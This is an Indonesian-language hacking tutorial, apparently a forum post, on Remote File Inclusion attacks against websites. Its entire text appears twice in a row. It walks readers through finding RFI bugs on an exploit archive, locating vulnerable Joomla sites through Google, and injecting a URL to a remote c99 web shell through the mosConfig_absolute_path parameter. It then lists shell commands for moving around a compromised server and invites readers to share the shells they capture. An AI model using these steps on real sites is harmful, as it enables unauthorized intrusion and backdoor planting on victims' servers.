sebelum kita masuk kedalam RFI ada baiknya mengetahui Web-hell dahulu,sebab nanti ini kan di pakai dalam RFI
macam-macam web-shell:
1. c99
2. c100
3. r57
bagamana mencarinya backdoor tersebut, kita cari melalui google
agar lebih paham aja gitu
RFI apa itu????
RFI(Remote File Inclusion) adalah salah satu metode hacking dengan memanfaatkan pintu belkang atau sering disebut backdoor!
=======
PERTAMA
=======
sebelum penyerangan,marilah kita berdoa menurut agama dan kepercayaan masing2
=======
KEDUA
=======
cari bug kalian
view ->> cari aja di www.milw0rm.com
kemudian klik search
kemudian tulislah RFI
========
KETIGA
========
udah kebuka tuh banyak sekali bug RFI disitu, pilih salah satu
=========
KEEMPAT
=========
setelah kita dapat bugnya kemudian kita search denga google
example bug:
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=[evil code]
========
KELIMA
========
kemudian search lah dengan google, apabila kita telah mendapatkan sitenya, trus kita taro file backdoor
example:
wwww.coba-coba.com/administrator/component/com_profiler/plugin.class.php?mosConfig_absolute_path=www.hahahahaha.net/backdoor/c99.txt??
========
KEENAM
========
apabila dibrowser tidak ada tampilan apa2 hanya tampilan site biasa,maka site tersebut sudah tidak vuln lagi
apabila dibrowser anda ada tampilan backdoor, maka site tersebut telah kalian kuasai
perintah berguna saat melakukan aktivitas backdoor :
cd namadirectory = Melihat Suatu directory
ls -al = Melihat Suatu Directory Lebih Dalam lagi
fined = Mengecek Directory directory
cat = Membaca Suatu Berkas
wget = MengUpload suatu Files
tar -zxvf = MengExtraxt suatu files yang berbentuk tgz
pwd = Mengetahui Di Directory mana Kita Berada
uname -a = Keberadaan Path berada
w = Mengetahui Siapa Saja yang telah menggunakan Shell.
curl = mendownload url
smoga bruntung
lau ada dapat shell nya , share2 yah
macam-macam web-shell:
1. c99
2. c100
3. r57
bagamana mencarinya backdoor tersebut, kita cari melalui google
agar lebih paham aja gitu
RFI apa itu????
RFI(Remote File Inclusion) adalah salah satu metode hacking dengan memanfaatkan pintu belkang atau sering disebut backdoor!
=======
PERTAMA
=======
sebelum penyerangan,marilah kita berdoa menurut agama dan kepercayaan masing2
=======
KEDUA
=======
cari bug kalian
view ->> cari aja di www.milw0rm.com
kemudian klik search
kemudian tulislah RFI
========
KETIGA
========
udah kebuka tuh banyak sekali bug RFI disitu, pilih salah satu
=========
KEEMPAT
=========
setelah kita dapat bugnya kemudian kita search denga google
example bug:
administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=[evil code]
========
KELIMA
========
kemudian search lah dengan google, apabila kita telah mendapatkan sitenya, trus kita taro file backdoor
example:
wwww.coba-coba.com/administrator/component/com_profiler/plugin.class.php?mosConfig_absolute_path=www.hahahahaha.net/backdoor/c99.txt??
========
KEENAM
========
apabila dibrowser tidak ada tampilan apa2 hanya tampilan site biasa,maka site tersebut sudah tidak vuln lagi
apabila dibrowser anda ada tampilan backdoor, maka site tersebut telah kalian kuasai
perintah berguna saat melakukan aktivitas backdoor :
cd namadirectory = Melihat Suatu directory
ls -al = Melihat Suatu Directory Lebih Dalam lagi
fined = Mengecek Directory directory
cat = Membaca Suatu Berkas
wget = MengUpload suatu Files
tar -zxvf = MengExtraxt suatu files yang berbentuk tgz
pwd = Mengetahui Di Directory mana Kita Berada
uname -a = Keberadaan Path berada
w = Mengetahui Siapa Saja yang telah menggunakan Shell.
curl = mendownload url
smoga bruntung
lau ada dapat shell nya , share2 yah